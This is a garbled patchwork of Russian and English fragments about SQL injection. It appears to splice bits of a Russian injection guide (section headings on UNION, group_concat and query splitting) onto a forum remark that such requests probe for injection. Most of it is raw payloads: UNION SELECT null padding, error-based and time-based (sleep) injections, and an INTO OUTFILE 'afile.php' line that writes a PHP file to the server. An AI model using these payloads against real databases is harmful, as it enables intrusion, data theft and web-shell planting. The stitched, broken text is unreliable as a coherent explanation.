...null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE 'afile.php'.
x group by concat(version(),floor(rand(0)*2)))-- (в некоторых случаях требуется) например колонки типа VARCHAR и размерностью >153 script.php?par=1 or (select count(*)from(select 1 union
...Null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
• SQL Injection into a String/Char parameter Example: SELECT * from table where example = 'Example' •.
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT
...union+all+select+null,null,null,null,null,null,null,null,null,null+and+'0'='0, чувства"+and+3>"1, понятие+о+трех+пространствах'+and+sleep(3)
1.3 Использование UNION + group_concat(). 1.4 Экранирование хвоста запроса. 1.5 Расщепление SQL-запроса.
';SELECT null,null,null,null,null,null,null,null,null,null, null,null,null,null работает вне зависимости от числа полей в исходном.
So, as it's being used a lot, I would submit my answer. In my opinion, the aim of these requests is to check the presence or absence of a sql injection.